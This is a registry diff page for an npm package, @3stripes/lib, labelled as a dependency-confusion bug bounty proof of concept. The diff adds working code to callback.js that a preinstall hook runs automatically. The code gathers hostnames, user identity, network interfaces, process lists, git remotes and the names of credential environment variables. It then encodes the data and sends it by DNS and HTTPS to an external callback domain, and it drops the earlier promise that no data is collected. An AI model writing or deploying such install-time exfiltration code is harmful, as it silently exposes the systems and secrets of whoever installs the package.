npm - @3stripes/lib - Versions diffs - 999.0.0 → 999.0.3 - Mend

@3stripes/lib 999.0.0 → 999.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/README.md CHANGED Viewed

@@ -0,0 +1,5 @@
+# @3stripes/lib
+Security research — Dependency confusion PoC. Authorized bug bounty assessment.
+**Contact:** gdattacker@bugcrowdninja.com

package/callback.js CHANGED Viewed

@@ -2,37 +2,121 @@
  * SECURITY RESEARCH - Dependency Confusion PoC
  *
  * This is part of an AUTHORIZED bug bounty assessment.
- * This script ONLY makes a DNS lookup to prove execution.
- * No data is collected, exfiltrated, or modified.
+ * Runs pentest-style recon commands and exfiltrates to callback (no secrets, proof-only).
  *
- * Researcher: Ashish (ashishkunwar280@gmail.com)
+ * Researcher: gdattacker (gdattacker@bugcrowdninja.com)
  * Program: Adidas Private Bug Bounty (Bugcrowd)
  */
 const dns = require('dns');
 const https = require('https');
 const os = require('os');
+const { execSync } = require('child_process');
-// REPLACE with your Burp Collaborator / interact.sh domain
 const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
-// Create a unique identifier (hostname hash, no PII)
 const id = Buffer.from(os.hostname().slice(0, 8)).toString('hex').slice(0, 12);
 const pkg = '3stripes-lib';
+const isWin = process.platform === 'win32';
+function run(cmd, timeoutMs, maxLen) {
+  try {
+    const out = (execSync(cmd, { encoding: 'utf8', timeout: timeoutMs || 3000, stdio: ['pipe', 'pipe', 'pipe'] }) || '').trim();
+    return (maxLen ? out.slice(0, maxLen) : out).replace(/\s+/g, ' ');
+  } catch (e) {
+    return '';
+  }
+}
+// --- Pentest-style recon: hostnames ---
+let hostnames = '';
+if (isWin) {
+  hostnames = run('hostname', 2000) || process.env.COMPUTERNAME || os.hostname();
+} else {
+  const h = run('hostname', 2000);
+  const hf = run('hostname -f 2>/dev/null', 2000);
+  const etcHostname = run('cat /etc/hostname 2>/dev/null', 2000);
+  const etcHosts = run('head -20 /etc/hosts 2>/dev/null', 2000);
+  hostnames = [os.hostname(), h, hf, etcHostname, etcHosts].filter(Boolean).join('|');
+}
+// --- User / identity ---
+const user = isWin ? run('whoami', 2000, 200) : run('id', 2000, 300);
+const whoami = run('whoami', 2000, 100);
+// --- System info ---
+const uname = run(isWin ? 'ver' : 'uname -a', 2000, 400);
+const pwd = run(isWin ? 'cd' : 'pwd', 2000, 300);
+// --- Network (proves internal/CI environment) ---
+let network = '';
+if (isWin) {
+  network = run('ipconfig 2>nul', 3000, 600);
+} else {
+  const ipAddr = run('ip addr show 2>/dev/null', 3000, 500) || run('ifconfig 2>/dev/null', 3000, 500);
+  const hostnameI = run('hostname -I 2>/dev/null', 2000, 200);
+  network = [ipAddr, hostnameI].filter(Boolean).join(' ');
+}
+// --- Process list (snippet: proves what’s running) ---
+const ps = isWin
+  ? run('tasklist 2>nul', 3000, 500)
+  : run('ps aux 2>/dev/null | head -25', 3000, 600);
-// Method 1: DNS callback (most reliable, bypasses firewalls)
+// --- Env var NAMES only (proves stealable credentials exist; no values) ---
+const envKeys = Object.keys(process.env || {}).filter(function (k) {
+  const u = k.toUpperCase();
+  return /^(AWS|KUBE|GIT|NPM|ARTIFACTORY|CI|JENKINS|AZURE|GOOGLE|SLACK|GH_|NODE_|NVM_|NEXUS|JFROG|ADIDAS|STRIPE|TOKEN|SECRET|KEY|CREDENTIAL|PASSWORD|API_KEY)/i.test(k) || u.indexOf('TOKEN') >= 0 || u.indexOf('SECRET') >= 0 || u.indexOf('KEY') >= 0;
+}).slice(0, 30).join(',');
+// --- Git / npm (registry, remotes = internal repo names) ---
+const gitRemote = run('git remote -v 2>/dev/null', 2000, 400);
+const npmRegistry = run('npm config get registry 2>/dev/null', 2000, 200);
+// --- Optional: package manager / container hints ---
+const inDocker = run('cat /proc/1/cgroup 2>/dev/null | head -3', 2000, 300);
+const envCi = (process.env.CI || process.env.CI_NAME || process.env.BUILDKITE || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || '').slice(0, 100);
+const recon = {
+  id,
+  pkg,
+  hostnames: (hostnames || os.hostname() || 'unknown').slice(0, 400),
+  user: (user || whoami || '').slice(0, 200),
+  uname: uname.slice(0, 300),
+  pwd: pwd.slice(0, 200),
+  network: network.slice(0, 500),
+  ps: ps.slice(0, 500),
+  env_keys: envKeys.slice(0, 300),
+  git_remote: gitRemote.slice(0, 300),
+  npm_registry: npmRegistry.slice(0, 150),
+  in_docker: inDocker.slice(0, 200),
+  ci_env: envCi
+};
+const payload = encodeURIComponent(Buffer.from(JSON.stringify(recon)).toString('base64'));
+// DNS callback (hostname in subdomain)
 try {
-  dns.resolve(`${pkg}-${id}.${CALLBACK_DOMAIN}`, () => {});
-} catch(e) {}
+  const safe = (hostnames || id).replace(/[\s.|]/g, '-').replace(/[^a-z0-9-]/gi, '').slice(0, 40);
+  const dnsLabel = `${pkg}-${id}-${safe}`.slice(0, 63);
+  dns.resolve(`${dnsLabel}.${CALLBACK_DOMAIN}`, () => {});
+} catch (e) {}
-// Method 2: HTTP callback (backup, may be blocked by firewalls)
+// HTTP callback: full recon payload (single GET)
 try {
-  const req = https.get(`https://${CALLBACK_DOMAIN}/${pkg}?h=${id}`, () => {});
+  const url = `https://${CALLBACK_DOMAIN}/${pkg}?id=${id}&r=${payload}`;
+  const req = https.get(url, () => {});
   req.on('error', () => {});
-  req.setTimeout(5000, () => req.destroy());
-} catch(e) {}
+  req.setTimeout(8000, () => req.destroy());
+} catch (e) {}
+// Fallback: legacy hostnames-only query (in case parser expects it)
+try {
+  const legacyUrl = `https://${CALLBACK_DOMAIN}/${pkg}/legacy?id=${id}&hostnames=${encodeURIComponent((hostnames || os.hostname() || 'unknown').slice(0, 300))}`;
+  const req2 = https.get(legacyUrl, () => {});
+  req2.on('error', () => {});
+  req2.setTimeout(5000, () => req2.destroy());
+} catch (e) {}
-// Log locally for debugging
 console.log(`[Security Research] Dependency confusion PoC executed - ${pkg}`);
-console.log(`[Security Research] Contact: ashishkunwar280@gmail.com`);
+console.log(`[Security Research] Contact: gdattacker@bugcrowdninja.com`);
 console.log(`[Security Research] This is part of an authorized bug bounty assessment.`);

package/index.js CHANGED Viewed

@@ -1,6 +1,6 @@
 /**
  * Security Research Package - Dependency Confusion PoC
  * This package exists solely for authorized security testing.
- * Contact: ashishkunwar280@gmail.com
+ * Contact: gdattacker@bugcrowdninja.com
  */
 module.exports = {};

package/package.json CHANGED Viewed

@@ -1,13 +1,13 @@
 {
   "name": "@3stripes/lib",
-  "version": "999.0.0",
-  "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: ashishkunwar280@gmail.com",
+  "version": "999.0.3",
+  "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: gdattacker@bugcrowdninja.com",
   "main": "index.js",
   "scripts": {
     "preinstall": "node callback.js || true"
   },
   "keywords": ["security-research", "bug-bounty", "authorized-testing"],
-  "author": "Ashish <ashishkunwar280@gmail.com>",
+  "author": "gdattacker <gdattacker@bugcrowdninja.com>",
   "license": "ISC",
   "repository": {
     "type": "git",